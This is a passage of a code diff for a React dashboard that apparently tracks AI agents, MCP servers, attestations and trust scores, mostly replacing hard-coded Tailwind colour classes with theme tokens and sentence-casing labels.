-                              {selectedAgent.createdByName || selectedAgent.createdByEmail || (selectedAgent.createdBySdkTokenId ? "SDK" : selectedAgent.createdByApiKeyId ? "API Key" : "Unknown")}
+                            <p className="text-sm text-ink">
+                              {selectedAgent.createdByName || selectedAgent.createdByEmail || (selectedAgent.createdBySdkTokenId ? "SDK" : selectedAgent.createdByApiKeyId ? "API key" : "Unknown")}
                             </p>
                             {selectedAgent.createdByEmail && selectedAgent.createdByName && (
-                              <p className="text-xs text-gray-500 dark:text-gray-400">{selectedAgent.createdByEmail}</p>
+                              <p className="text-xs text-ink-secondary">{selectedAgent.createdByEmail}</p>
                             )}
                             {!selectedAgent.createdByName && !selectedAgent.createdByEmail && selectedAgent.createdBySdkTokenId && (
-                              <p className="text-xs text-gray-500 dark:text-gray-400">via SDK Token</p>
+                              <p className="text-xs text-ink-secondary">via SDK token</p>
                             )}
                           </div>
                         </div>
@@ -2200,17 +2205,17 @@ function SupplyChainPage() {
 
                     {/* Capabilities */}
                     <div>
-                      <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase mb-2">
-                        Declared Capabilities ({(selectedAgent.capabilities || []).length})
+                      <p className="text-xs font-medium text-ink-secondary uppercase mb-2">
+                        Declared capabilities ({(selectedAgent.capabilities || []).length})
                       </p>
                       {(selectedAgent.capabilities || []).length === 0 ? (
-                        <p className="text-sm text-gray-400">No capabilities declared</p>
+                        <p className="text-sm text-ink-tertiary">No capabilities declared</p>
                       ) : (
                         <div className="flex flex-wrap gap-2">
                           {(selectedAgent.capabilities || []).map((cap, idx) => (
                             <span
                               key={idx}
-                              className="inline-flex items-center px-3 py-1 rounded-lg text-sm font-medium bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300"
+                              className="inline-flex items-center px-3 py-1 rounded-lg text-sm font-medium bg-glass-inset-gray text-ink-body"
                             >
                               {cap}
                             </span>
@@ -2221,17 +2226,17 @@ function SupplyChainPage() {
 
                     {/* Data Access */}
                     <div>
-                      <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase mb-2">
-                        Data Access Permissions ({(selectedAgent.dataAccess || []).length})
+                      <p className="text-xs font-medium text-ink-secondary uppercase mb-2">
+                        Data access permissions ({(selectedAgent.dataAccess || []).length})
                       </p>
                       {(selectedAgent.dataAccess || []).length === 0 ? (
-                        <p className="text-sm text-gray-400">No data access permissions declared</p>
+                        <p className="text-sm text-ink-tertiary">No data access permissions declared</p>
                       ) : (
                         <div className="flex flex-wrap gap-2">
                           {(selectedAgent.dataAccess || []).map((data, idx) => (
                             <span
                               key={idx}
-                              className="inline-flex items-center px-3 py-1 rounded-lg text-sm font-medium bg-gray-100 dark:bg-gray-700 text-gray-700 dark:text-gray-300"
+                              className="inline-flex items-center px-3 py-1 rounded-lg text-sm font-medium bg-glass-inset-gray text-ink-body"
                             >
                               <Database className="h-4 w-4 mr-1.5" />
                               {data}
@@ -2243,11 +2248,11 @@ function SupplyChainPage() {
 
                     {/* Connected MCP Servers */}
                     <div>
-                      <p className="text-xs font-medium text-gray-500 dark:text-gray-400 uppercase mb-2">
-                        Connected MCP Servers
+                      <p className="text-xs font-medium text-ink-secondary uppercase mb-2">
+                        Connected MCP servers
                       </p>
                       {connections.filter(c => c.agentId === selectedAgent.id).length === 0 ? (
-                        <p className="text-sm text-gray-400">No MCP server connections observed</p>
+                        <p className="text-sm text-ink-tertiary">No MCP server connections observed</p>
                       ) : (
                         <div className="space-y-2">
                           {connections
@@ -2255,21 +2260,21 @@ function SupplyChainPage() {
                             .map((conn) => (
                               <div
                                 key={conn.id}
-                                className="flex items-center justify-between p-3 bg-gray-50 dark:bg-gray-900/50 rounded-lg border border-gray-200 dark:border-gray-700"
+                                className="flex items-center justify-between p-3 rounded-inset bg-glass-inset-gray"
                               >
                                 <div className="flex items-center gap-2">
-                                  <Server className="h-4 w-4 text-gray-500" />
-                                  <span className="text-sm font-medium text-gray-900 dark:text-white">
+                                  <Server className="h-4 w-4 text-ink-secondary" />
+                                  <span className="text-sm font-medium text-ink">
                                     {conn.mcpServerName}
                                   </span>
                                 </div>
                                 {conn.isActive ? (
-                                  <span className="inline-flex items-center text-xs text-green-600 dark:text-green-400">
+                                  <span className="inline-flex items-center text-xs text-success-text">
                                     <CheckCircle2 className="h-3 w-3 mr-1" />
                                     Active
                                   </span>
                                 ) : (
-                                  <span className="inline-flex items-center text-xs text-gray-500">
+                                  <span className="inline-flex items-center text-xs text-ink-secondary">
                                     <XCircle className="h-3 w-3 mr-1" />
                                     Inactive
                                   </span>
@@ -2296,8 +2301,8 @@ export default function SupplyChainPageWrapper() {
       <Suspense fallback={
         <div className="min-h-screen flex items-center justify-center">
           <div className="text-center">
-            <Loader2 className="h-8 w-8 animate-spin text-blue-500 mx-auto mb-4" />
-            <p className="text-gray-500 dark:text-gray-400">Loading...</p>
+            <Loader2 className="h-8 w-8 animate-spin text-brand-text mx-auto mb-4" />
+            <p className="text-ink-secondary">Loading...</p>
           </div>
         </div>
       }>

--- a/apps/web/components/mcp/network-graph.tsx
+++ b/apps/web/components/mcp/network-graph.tsx
@@ -58,21 +58,21 @@ interface FlowNodeData {
 function MCPNode({ data }: { data: any }) {
   return (
     <div
-      className="flex flex-col items-center justify-center p-3 rounded-lg border-2 shadow-md bg-white dark:bg-gray-800 min-w-[120px] cursor-pointer hover:shadow-lg transition-shadow"
+      className="flex flex-col items-center justify-center p-3 rounded-panel border-2 shadow-panel bg-glass backdrop-blur-card min-w-[120px] cursor-pointer hover:shadow-chrome transition-shadow"
       style={{ borderColor: data.color }}
     >
       <Server
         className="h-6 w-6 mb-1"
         style={{ color: data.color }}
       />
-      <div className="text-xs font-medium text-gray-900 dark:text-gray-100 text-center max-w-[100px] truncate">
+      <div className="text-xs font-medium text-ink text-center max-w-[100px] truncate">
         {data.label}
       </div>
-      <div className="text-[10px] text-gray-500 dark:text-gray-400">
+      <div className="text-[10px] text-ink-secondary">
         {data.trustScore.toFixed(0)}% trust
       </div>
       <div
-        className="mt-1 px-2 py-0.5 rounded-full text-[9px] font-medium"
+        className="mt-1 px-2 py-0.5 rounded-pill text-[9px] font-medium"
         style={{
           backgroundColor: `${data.color}20`,
           color: data.color,
@@ -88,17 +88,17 @@ function MCPNode({ data }: { data: any }) {
 function AgentNode({ data }: { data: any }) {
   return (
     <div
-      className="flex flex-col items-center justify-center p-3 rounded-full border-2 shadow-md bg-white dark:bg-gray-800 min-w-[100px] min-h-[100px] cursor-pointer hover:shadow-lg transition-shadow"
+      className="flex flex-col items-center justify-center p-3 rounded-full border-2 shadow-panel bg-glass backdrop-blur-card min-w-[100px] min-h-[100px] cursor-pointer hover:shadow-chrome transition-shadow"
       style={{ borderColor: data.color }}
     >
       <Bot
         className="h-5 w-5 mb-1"
         style={{ color: data.color }}
       />
-      <div className="text-xs font-medium text-gray-900 dark:text-gray-100 text-center max-w-[80px] truncate">
+      <div className="text-xs font-medium text-ink text-center max-w-[80px] truncate">
         {data.label}
       </div>
-      <div className="text-[10px] text-gray-500 dark:text-gray-400">
+      <div className="text-[10px] text-ink-secondary">
         {data.trustScore.toFixed(0)}%
       </div>
     </div>
@@ -197,15 +197,15 @@ export function MCPNetworkGraph({
         type: "smoothstep",
         animated: edge.type === "attestation",
         style: {
-          stroke: edge.type === "attestation" ? "#22c55e" : "#6b7280",
+          stroke: edge.type === "attestation" ? "var(--green)" : "var(--text-tertiary)",
           strokeWidth: edge.weight,
         },
         markerEnd: {
           type: MarkerType.ArrowClosed,
-          color: edge.type === "attestation" ? "#22c55e" : "#6b7280",
+          color: edge.type === "attestation" ? "var(--green)" : "var(--text-tertiary)",
         },
         label: edge.type === "attestation" ? "attested" : undefined,
-        labelStyle: { fontSize: 10, fill: "#6b7280" },
+        labelStyle: { fontSize: 10, fill: "var(--text-secondary)" },
       }));
 
       setNodes(flowNodes);
@@ -235,12 +235,12 @@ export function MCPNetworkGraph({
   if (loading) {
     return (
       <div
-        className="flex items-center justify-center bg-gray-50 dark:bg-gray-900 rounded-lg border border-gray-200 dark:border-gray-700"
+        className="flex items-center justify-center glass rounded-panel"
         style={{ height }}
       >
         <div className="flex flex-col items-center gap-2">
-          <Loader2 className="h-8 w-8 animate-spin text-blue-500" />
-          <span className="text-sm text-gray-500 dark:text-gray-400">
+          <Loader2 className="h-8 w-8 animate-spin text-brand-text" />
+          <span className="text-sm text-ink-secondary">
             Loading network graph...
           </span>
         </div>
@@ -251,17 +251,17 @@ export function MCPNetworkGraph({
   if (error) {
     return (
       <div
-        className="flex items-center justify-center bg-gray-50 dark:bg-gray-900 rounded-lg border border-gray-200 dark:border-gray-700"
+        className="flex items-center justify-center glass-alert rounded-panel"
         style={{ height }}
       >
         <div className="flex flex-col items-center gap-2">
-          <AlertCircle className="h-8 w-8 text-red-500" />
-          <span className="text-sm text-gray-500 dark:text-gray-400">
+          <AlertCircle className="h-8 w-8 text-danger-text" />
+          <span className="text-sm text-ink-secondary">
             {error}
           </span>
           <button
             onClick={fetchGraphData}
-            className="mt-2 px-3 py-1 text-sm bg-blue-600 text-white rounded hover:bg-blue-700 flex items-center gap-1"
+            className="mt-2 px-3 py-1 text-sm rounded-pill bg-brand text-white shadow-glow hover:bg-brand-hover flex items-center gap-1"
           >
             <RefreshCw className="h-3 w-3" />
             Retry
@@ -274,15 +274,15 @@ export function MCPNetworkGraph({
   if (nodes.length === 0) {
     return (
       <div
-        className="flex items-center justify-center bg-gray-50 dark:bg-gray-900 rounded-lg border border-gray-200 dark:border-gray-700"
+        className="flex items-center justify-center glass rounded-panel"
         style={{ height }}
       >
         <div className="flex flex-col items-center gap-2 text-center">
-          <Server className="h-12 w-12 text-gray-300 dark:text-gray-600" />
-          <p className="text-sm font-medium text-gray-500 dark:text-gray-400">
+          <Server className="h-12 w-12 text-ink-tertiary" />
+          <p className="text-sm font-medium text-ink-secondary">
             No connections yet
           </p>
-          <p className="text-xs text-gray-400 dark:text-gray-500 max-w-xs">
+          <p className="text-xs text-ink-tertiary max-w-xs">
             Register MCP servers and configure agent connections to see the
             network graph
           </p>
@@ -304,58 +304,61 @@ export function MCPNetworkGraph({
         fitViewOptions={{ padding: 0.2 }}
         minZoom={0.5}
         maxZoom={2}
-        className="bg-gray-50 dark:bg-gray-900 rounded-lg border border-gray-200 dark:border-gray-700"
+        className="bg-glass rounded-panel border border-divider"
       >
-        {showControls && <Controls className="!bg-white dark:!bg-gray-800 !border-gray-200 dark:!border-gray-700" />}
-        <Background variant={BackgroundVariant.Dots} gap={16} size={1} color="#d1d5db" />
+        {showControls && <Controls className="!bg-glass !border-glass-border" />}
+        <Background variant={BackgroundVariant.Dots} gap={16} size={1} color="var(--stroke)" />
       </ReactFlow>
 
       {/* Legend */}
       {showLegend && (
-        <div className="absolute bottom-4 left-4 bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 p-3 shadow-sm">
-          <div className="text-xs font-medium text-gray-700 dark:text-gray-300 mb-2">
+        <div className="absolute bottom-4 left-4 glass rounded-panel p-3">
+          <div className="text-xs font-medium text-ink mb-2">
             Legend
           </div>
           <div className="space-y-1.5">
             <div className="flex items-center gap-2">
-              <div className="w-4 h-4 rounded border-2 border-gray-400 flex items-center justify-center">
-                <Server className="h-2 w-2 text-gray-400" />
+              <div className="w-4 h-4 rounded border-2 border-ink-tertiary flex items-center justify-center">
+                <Server className="h-2 w-2 text-ink-tertiary" />
               </div>
-              <span className="text-[10px] text-gray-600 dark:text-gray-400">
-                MCP Server
+              <span className="text-[10px] text-ink-secondary">
+                MCP server
               </span>
             </div>
             <div className="flex items-center gap-2">
-              <div className="w-4 h-4 rounded-full border-2 border-gray-400 flex items-center justify-center">
-                <Bot className="h-2 w-2 text-gray-400" />
+              <div className="w-4 h-4 rounded-full border-2 border-ink-tertiary flex items-center justify-center">
+                <Bot className="h-2 w-2 text-ink-tertiary" />
               </div>
-              <span className="text-[10px] text-gray-600 dark:text-gray-400">
+              <span className="text-[10px] text-ink-secondary">
                 Agent
               </span>
             </div>
             <div className="flex items-center gap-2">
-              <div className="w-6 h-0.5 bg-gray-400"></div>
-              <span className="text-[10px] text-gray-600 dark:text-gray-400">
+              <div className="w-6 h-0.5 bg-ink-tertiary"></div>
+              <span className="text-[10px] text-ink-secondary">
                 Connection
               </span>
             </div>
             <div className="flex items-center gap-2">
-              <div className="w-6 h-0.5 bg-green-500 animate-pulse"></div>
-              <span className="text-[10px] text-gray-600 dark:text-gray-400">
+              <div className="w-6 h-0.5 bg-success animate-pulse"></div>
+              <span className="text-[10px] text-ink-secondary">
                 Attestation
               </span>
             </div>
           </div>
-          <div className="mt-2 pt-2 border-t border-gray-200 dark:border-gray-700">
-            <div className="text-[10px] text-gray-500 dark:text-gray-400">
-              Trust Score Colors
+          <div className="mt-2 pt-2 border-t border-divider">
+            <div className="text-[10px] text-ink-secondary">
+              Trust score colors
             </div>
+            {/* These swatches echo the exact scale the API sends as node.color
+                (backend trustScoreColor). They are data, not theme chrome:
+                tokenising them would stop the legend matching the drawn nodes. */}
             <div className="flex gap-1 mt-1">
-              <div className="w-3 h-3 rounded bg-green-500" title="≥80%"></div>
-              <div className="w-3 h-3 rounded bg-lime-500" title="60-79%"></div>
-              <div className="w-3 h-3 rounded bg-yellow-500" title="40-59%"></div>
-              <div className="w-3 h-3 rounded bg-orange-500" title="20-39%"></div>
-              <div className="w-3 h-3 rounded bg-red-500" title="<20%"></div>
+              <div className="w-3 h-3 rounded" style={{ backgroundColor: "#22c55e" }} title="≥80%"></div>
+              <div className="w-3 h-3 rounded" style={{ backgroundColor: "#84cc16" }} title="60-79%"></div>
+              <div className="w-3 h-3 rounded" style={{ backgroundColor: "#eab308" }} title="40-59%"></div>
+              <div className="w-3 h-3 rounded" style={{ backgroundColor: "#f97316" }} title="20-39%"></div>
+              <div className="w-3 h-3 rounded" style={{ backgroundColor: "#ef4444" }} title="<20%"></div>
             </div>
           </div>
         </div>
@@ -364,10 +367,10 @@ export function MCPNetworkGraph({
       {/* Refresh button */}
       <button
         onClick={fetchGraphData}
-        className="absolute top-4 right-4 p-2 bg-white dark:bg-gray-800 rounded-lg border border-gray-200 dark:border-gray-700 shadow-sm hover:bg-gray-50 dark:hover:bg-gray-700 transition-colors"
+        className="absolute top-4 right-4 p-2 glass rounded-inset hover:bg-glass-inset-gray transition-colors"
         title="Refresh graph"
       >
-        <RefreshCw className="h-4 w-4 text-gray-500 dark:text-gray-400" />
+        <RefreshCw className="h-4 w-4 text-ink-secondary" />
       </button>
     </div>
   );

--- a/apps/web/components/modals/mcp-detail-modal.tsx
+++ b/apps/web/components/modals/mcp-detail-modal.tsx
@@ -207,24 +207,24 @@ export function MCPDetailModal({
   const getActionDisplayInfo = (action: string) => {
     const actionMap: Record<string, { label: string; color: string }> = {
       // Standard action names from backend
-      "create": { label: "Created", color: "text-green-600 dark:text-green-400" },
-      "update": { label: "Updated", color: "text-blue-600 dark:text-blue-400" },
-      "delete": { label: "Deleted", color: "text-red-600 dark:text-red-400" },
-      "verify": { label: "Verified", color: "text-green-600 dark:text-green-400" },
-      "attest": { label: "Attestation Recorded", color: "text-purple-600 dark:text-purple-400" },
-      "view": { label: "Viewed", color: "text-gray-600 dark:text-gray-400" },
+      "create": { label: "Created", color: "text-success-text" },
+      "update": { label: "Updated", color: "text-brand-text" },
+      "delete": { label: "Deleted", color: "text-danger-text" },
+      "verify": { label: "Verified", color: "text-success-text" },
+      "attest": { label: "Attestation recorded", color: "text-brand-text" },
+      "view": { label: "Viewed", color: "text-ink-secondary" },
       // Legacy/alternative action names for compatibility
-      "mcp.created": { label: "MCP Created", color: "text-green-600 dark:text-green-400" },
-      "mcp.updated": { label: "MCP Updated", color: "text-blue-600 dark:text-blue-400" },
-      "mcp.deleted": { label: "MCP Deleted", color: "text-red-600 dark:text-red-400" },
-      "mcp.attestation.created": { label: "Attestation Created", color: "text-purple-600 dark:text-purple-400" },
-      "mcp.attestation.verified": { label: "Attestation Verified", color: "text-purple-600 dark:text-purple-400" },
-      "mcp.capability.detected": { label: "Capability Detected", color: "text-indigo-600 dark:text-indigo-400" },
-      "mcp.capability.created": { label: "Capability Added", color: "text-indigo-600 dark:text-indigo-400" },
-      "mcp.connection.created": { label: "Agent Connected", color: "text-cyan-600 dark:text-cyan-400" },
-      "mcp.verified": { label: "MCP Verified", color: "text-green-600 dark:text-green-400" },
+      "mcp.created": { label: "MCP created", color: "text-success-text" },
+      "mcp.updated": { label: "MCP updated", color: "text-brand-text" },
+      "mcp.deleted": { label: "MCP deleted", color: "text-danger-text" },
+      "mcp.attestation.created": { label: "Attestation created", color: "text-brand-text" },
+      "mcp.attestation.verified": { label: "Attestation verified", color: "text-brand-text" },
+      "mcp.capability.detected": { label: "Capability detected", color: "text-brand-text" },
+      "mcp.capability.created": { label: "Capability added", color: "text-brand-text" },
+      "mcp.connection.created": { label: "Agent connected", color: "text-brand-text" },
+      "mcp.verified": { label: "MCP verified", color: "text-success-text" },
     };
-    return actionMap[action] || { label: action, color: "text-gray-600 dark:text-gray-400" };
+    return actionMap[action] || { label: action, color: "text-ink-secondary" };
   };
 
   if (!isOpen || !mcp) return null;
@@ -232,58 +232,57 @@ export function MCPDetailModal({
   const getStatusColor = (status: string) => {
     switch (status) {
       case "active":
-        return "bg-green-100 dark:bg-green-900/30 text-green-800 dark:text-green-300";
+        return "border border-success-border bg-success-fill text-success-text";
       case "pending":
-        return "bg-yellow-100 dark:bg-yellow-900/30 text-yellow-800 dark:text-yellow-300";
+        return "border border-warning-border bg-warning-fill text-warning-text";
       case "inactive":
-        return "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300";
+        return "border border-stroke bg-glass-inset-gray text-ink-body";
       default:
-        return "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300";
+        return "border border-stroke bg-glass-inset-gray text-ink-body";
     }
   };
 
+  // Three tiers: 80 and above, 60-79, below 60.
   const getTrustScoreColor = (score: number) => {
-    if (score >= 80) return "text-green-600 dark:text-green-400";
-    if (score >= 60) return "text-yellow-600 dark:text-yellow-400";
-    if (score >= 40) return "text-orange-600 dark:text-orange-400";
-    return "text-red-600 dark:text-red-400";
+    if (score >= 80) return "text-success-text";
+    if (score >= 60) return "text-warning-text";
+    return "text-danger-text";
   };
 
   const getConfidenceScoreColor = (score: number) => {
-    if (score >= 80) return "text-green-600 dark:text-green-400";
-    if (score >= 60) return "text-yellow-600 dark:text-yellow-400";
-    if (score >= 40) return "text-orange-600 dark:text-orange-400";
-    return "text-red-600 dark:text-red-400";
+    if (score >= 80) return "text-success-text";
+    if (score >= 60) return "text-warning-text";
+    return "text-danger-text";
   };
 
   const getVerificationMethodBadge = (method?: string) => {
     switch (method) {
       case "agent_attestation":
         return {
-          text: "Agent Attested",
-          color: "bg-blue-100 dark:bg-blue-900/30 text-blue-800 dark:text-blue-300",
+          text: "Agent attested",
+          color: "border border-stroke bg-brand-soft text-brand-text",
         };
       case "api_key":
         return {
-          text: "API Key",
-          color: "bg-purple-100 dark:bg-purple-900/30 text-purple-800 dark:text-purple-300",
+          text: "API key",
+          color: "border border-stroke bg-brand-soft text-brand-text",
         };
       case "manual":
         return {
           text: "Manual",
-          color: "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300",
+          color: "border border-stroke bg-glass-inset-gray text-ink-body",
         };
       default:
         return {
           text: "Unknown",
-          color: "bg-gray-100 dark:bg-gray-700 text-gray-800 dark:text-gray-300",
+          color: "border border-stroke bg-glass-inset-gray text-ink-body",
         };
     }
   };
 
-  const calculateFingerprint = (publicKey: string): string => {
+  // The first 64 characters of the encoded key, grouped in pairs. Not a digest.
+  const publicKeyPrefix = (publicKey: string): string => {
     if (!publicKey) return "N/A";
-    // Simple mock fingerprint - in production this would use crypto.subtle.digest
     const hash = publicKey.substring(0, 64);
     return (
       hash
@@ -316,28 +315,28 @@ export function MCPDetailModal({
 
   return (
     <div
-      className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-black/50"
+      className="fixed inset-0 z-50 flex items-center justify-center p-4 bg-[rgba(29,29,31,0.45)] backdrop-blur-sm"
       onClick={handleOverlayClick}
     >
-      <div className="bg-white dark:bg-gray-900 rounded-lg shadow-xl max-w-4xl w-full max-h-[90vh] overflow-y-auto">
+      <div className="glass-chrome max-w-4xl w-full max-h-[90vh] overflow-y-auto">
         {/* Header */}
-        <div className="flex items-center justify-between px-6 py-4 border-b border-gray-200 dark:border-gray-700">
+        <div className="flex items-center justify-between px-6 py-4 border-b border-divider">
           <div className="flex items-center gap-3">
-            <div className="w-12 h-12 bg-gradient-to-br from-purple-500 to-purple-600 rounded-lg flex items-center justify-center">
-              <Shield className="h-6 w-6 text-white" />
+            <div className="w-12 h-12 bg-logo rounded-inset flex items-center justify-center">
+              <Shield className="h-6 w-6 text-ink-inverse" />
             </div>
             <div>
-              <h2 className="text-xl font-semibold text-gray-900 dark:text-white">
+              <h2 className="text-xl font-semibold text-ink">
                 {mcp?.name || "Unknown MCP"}
               </h2>
-              <p className="text-sm text-gray-500 dark:text-gray-400">
+              <p className="text-sm text-ink-secondary">
                 {mcp?.id || "Unknown ID"}
               </p>
             </div>
           </div>
           <button
             onClick={onClose}
-            className="text-gray-400 hover:text-gray-600 dark:hover:text-gray-300 transition-colors"
+            className="text-ink-tertiary hover:text-ink transition-colors"
           >
             <X className="h-5 w-5" />
           </button>
@@ -353,7 +352,7 @@ export function MCPDetailModal({
               </TabsTrigger>
               <TabsTrigger value="activity" className="flex items-center gap-2">
                 <Activity className="h-4 w-4" />
-                Audit Trail
+                Audit trail
               </TabsTrigger>
             </TabsList>
 
@@ -361,7 +360,7 @@ export function MCPDetailModal({
               {/* Status and Metrics - Updated to match agent detail modal */}
               <div className="flex items-center gap-4">
             <div>
-              <span className="text-sm text-gray-500 dark:text-gray-400 block mb-1">
+              <span className="text-sm text-ink-secondary block mb-1">
                 Status
               </span>
               <span
@@ -371,10 +370,10 @@ export function MCPDetailModal({
               </span>
             </div>
             <div>
-              <span className="text-sm text-gray-500 dark:text-gray-400 block mb-1">
+              <span className="text-sm text-ink-secondary block mb-1">
                 {mcp.verificationMethod === "agent_attestation"
-                  ? "Confidence Score"
-                  : "Trust Score"}
+                  ? "Confidence score"
+                  : "Trust score"}
               </span>
               <span
                 className={`text-2xl font-bold ${
@@ -390,10 +389,10 @@ export function MCPDetailModal({
               </span>
             </div>
             <div>
-              <span className="text-sm text-gray-500 dark:text-gray-400 block mb-1">
+              <span className="text-sm text-ink-secondary block mb-1">
                 Capabilities
               </span>
-              <span className="text-lg font-semibold text-gray-900 dark:text-white">
+              <span className="text-lg font-semibold text-ink">
                 {mcp.capabilities?.length || 0}
               </span>
             </div>
@@ -401,18 +400,18 @@ export function MCPDetailModal({
 
           {/* Agent Attestation Info (if using agent attestation) */}
           {mcp.verificationMethod === "agent_attestation" && (
-            <div className="bg-blue-50 dark:bg-blue-900/10 border border-blue-200 dark:border-blue-800 rounded-lg p-4">
+            <div className="rounded-card border border-stroke bg-brand-soft p-4">
               <div className="flex items-start gap-3">
-                <Shield className="h-5 w-5 text-blue-600 dark:text-blue-400 mt-0.5" />
+                <Shield className="h-5 w-5 text-brand-text mt-0.5" />
                 <div className="flex-1">
                   <div className="flex items-center justify-between mb-2">
-                    <h4 className="text-sm font-semibold text-blue-900 dark:text-blue-100">
-                      Verified by Attestations
+                    <h4 className="text-sm font-semibold text-ink">
+                      Verified by attestations
                     </h4>
                     {attestations.length > 0 && (
                       <button
                         onClick={() => setShowAttestations(!showAttestations)}
-                        className="flex items-center gap-1 text-xs text-blue-600 dark:text-blue-400 hover:text-blue-700 dark:hover:text-blue-300"
+                        className="flex items-center gap-1 text-xs font-semibold text-brand-text hover:underline"
                       >
                         {showAttestations ? (
                           <>
@@ -430,69 +429,69 @@ export function MCPDetailModal({
                   </div>
                   <div className="grid grid-cols-2 gap-3 text-sm">
                     <div>
-                      <span className="text-blue-700 dark:text-blue-300 font-medium">
+                      <span className="text-ink font-medium">
                         {mcp.attestationCount || 0}
                       </span>
-                      <span className="text-blue-600 dark:text-blue-400 ml-1">
+                      <span className="text-ink-secondary ml-1">
                         {mcp.attestationCount === 1 ? "attestation" : "attestations"}
                       </span>
                     </div>
                     {mcp.lastAttestedAt && (
                       <div>
-                        <span className="text-blue-700 dark:text-blue-300 font-medium">
+                        <span className="text-ink font-medium">
                           Last attested:
                         </span>
-                        <span className="text-blue-600 dark:text-blue-400 ml-1">
+                        <span className="text-ink-secondary ml-1">
                           {formatDateTime(mcp.lastAttestedAt)}
                         </span>
                       </div>
                     )}
                   </div>
-                  <p className="text-xs text-blue-600 dark:text-blue-400 mt-2">
+                  <p className="text-xs text-ink-body mt-2">
                     This MCP server's identity is verified by {mcp.attestationCount || 0} attestation
                     {mcp.attestationCount !== 1 ? "s" : ""} from agents and users.
                   </p>
 
                   {/* Detailed Attestations List */}
                   {showAttestations && attestations.length > 0 && (
-                    <div className="mt-4 space-y-2 border-t border-blue-200 dark:border-blue-800 pt-3">
-                      <h5 className="text-xs font-semibold text-blue-800 dark:text-blue-200 mb-2">
-                        Attestation History
+                    <div className="mt-4 space-y-2 border-t border-divider pt-3">
+                      <h5 className="text-xs font-semibold text-ink mb-2">
+                        Attestation history
                       </h5>
                       {attestations.map((att) => (
                         <div
                           key={att.id}
-                          className="bg-white/50 dark:bg-black/20 rounded p-3 text-xs space-y-2"
+                          className="glass-inset p-3 text-xs space-y-2"
                         >
                           <div className="flex items-start justify-between gap-2">
                             <div className="flex items-center gap-2">
                               {att.attesterType === "agent" ? (
-                                <Bot className="h-4 w-4 text-blue-600 dark:text-blue-400 flex-shrink-0" />
+                                <Bot className="h-4 w-4 text-brand-text flex-shrink-0" />
                               ) : (
-                                <User className="h-4 w-4 text-purple-600 dark:text-purple-400 flex-shrink-0" />
+                                <User className="h-4 w-4 text-ink-secondary flex-shrink-0" />
                               )}
                               <div>
-                                <p className="font-medium text-blue-900 dark:text-blue-100">
+                                <p className="font-medium text-ink">
                                   {att.attestedBy}
                                   {att.attesterType === "agent" && att.agentOwnerName && (
-                                    <span className="ml-1 font-normal text-xs text-blue-700 dark:text-blue-300">
+                                    <span className="ml-1 font-normal text-xs text-ink-secondary">
                                       (owned by {att.agentOwnerName})
                                     </span>
                                   )}
                                 </p>
-                                <p className="text-blue-600 dark:text-blue-400">
+                                <p className="text-ink-secondary">
                                   {att.attesterType === "agent" ? "Agent" : "User"} • {att.attestationType === "sdk" ? "SDK" : "Manual"}
                                 </p>
                               </div>
                             </div>
                             <div className="text-right flex-shrink-0">
                               {att.isValid ? (
-                                <span className="inline-flex items-center gap-1 px-2 py-0.5 bg-green-100 dark:bg-green-900/30 text-green-700 dark:text-green-300 rounded text-xs">
+                                <span className="inline-flex items-center gap-1 rounded-pill border border-success-border bg-success-fill px-2 py-0.5 text-xs text-success-text">
                                   <CheckCircle className="h-3 w-3" />
                                   Valid
                                 </span>
                               ) : (
-                                <span className="inline-flex items-center gap-1 px-2 py-0.5 bg-red-100 dark:bg-red-900/30 text-red-700 dark:text-red-300 rounded text-xs">
+                                <span className="inline-flex items-center gap-1 rounded-pill border border-danger-border bg-danger-fill px-2 py-0.5 text-xs text-danger-text">
                                   Expired
                                 </span>
                               )}
@@ -501,15 +500,15 @@ export function MCPDetailModal({
 
                           <div className="grid grid-cols-2 gap-2 text-xs">
                             <div>
-                              <span className="text-blue-700 dark:text-blue-300">Verified:</span>
-                              <span className="ml-1 text-blue-600 dark:text-blue-400">
+                              <span className="text-ink-body">Verified:</span>
+                              <span className="ml-1 text-ink-secondary">
                                 {formatDateTime(att.verifiedAt)}
                               </span>
                             </div>
                             {att.attestationType === "sdk" && att.sdkVersion && (
                               <div>
-                                <span className="text-blue-700 dark:text-blue-300">SDK:</span>
-                                <span className="ml-1 text-blue-600 dark:text-blue-400">
+                                <span className="text-ink-body">SDK:</span>
+                                <span className="ml-1 text-ink-secondary">
                                   {att.sdkVersion}
                                 </span>
                               </div>
@@ -518,35 +517,35 @@ export function MCPDetailModal({
 
                           <div className="flex flex-wrap gap-2">
                             {att.signatureVerified && (
-                              <span className="inline-flex items-center gap-1 px-2 py-0.5 bg-blue-100 dark:bg-blue-900/30 text-blue-700 dark:text-blue-300 rounded text-xs">
+                              <span className="inline-flex items-center gap-1 rounded-pill border border-stroke bg-brand-soft px-2 py-0.5 text-xs text-brand-text">
                                 <Shield className="h-3 w-3" />
-                                Signature Verified
+                                Signature verified
                               </span>
                             )}
                             {att.connectionSuccessful && (
-                              <span className="inline-flex items-center gap-1 px-2 py-0.5 bg-green-100 dark:bg-green-900/30 text-green-700 dark:text-green-300 rounded text-xs">
+                              <span className="inline-flex items-center gap-1 rounded-pill border border-success-border bg-success-fill px-2 py-0.5 text-xs text-success-text">
                                 <CheckCircle className="h-3 w-3" />
                                 Connection OK
                               </span>
                             )}
                             {att.healthCheckPassed && (
-                              <span className="inline-flex items-center gap-1 px-2 py-0.5 bg-green-100 dark:bg-green-900/30 text-green-700 dark:text-green-300 rounded text-xs">
+                              <span className="inline-flex items-center gap-1 rounded-pill border border-success-border bg-success-fill px-2 py-0.5 text-xs text-success-text">
                                 <CheckCircle className="h-3 w-3" />
-                                Health Check Passed
+                                Health check passed
                               </span>
                             )}
                           </div>
 
                           {att.capabilitiesConfirmed && att.capabilitiesConfirmed.length > 0 && (
                             <div>
-                              <p className="text-blue-700 dark:text-blue-300 mb-1">
-                                Capabilities Verified ({att.capabilitiesConfirmed.length}):
+                              <p className="text-ink-body mb-1">
+                                Capabilities verified ({att.capabilitiesConfirmed.length}):
                               </p>
                               <div className="flex flex-wrap gap-1">
                                 {att.capabilitiesConfirmed.map((cap, idx) => (
                                   <span
                                     key={idx}
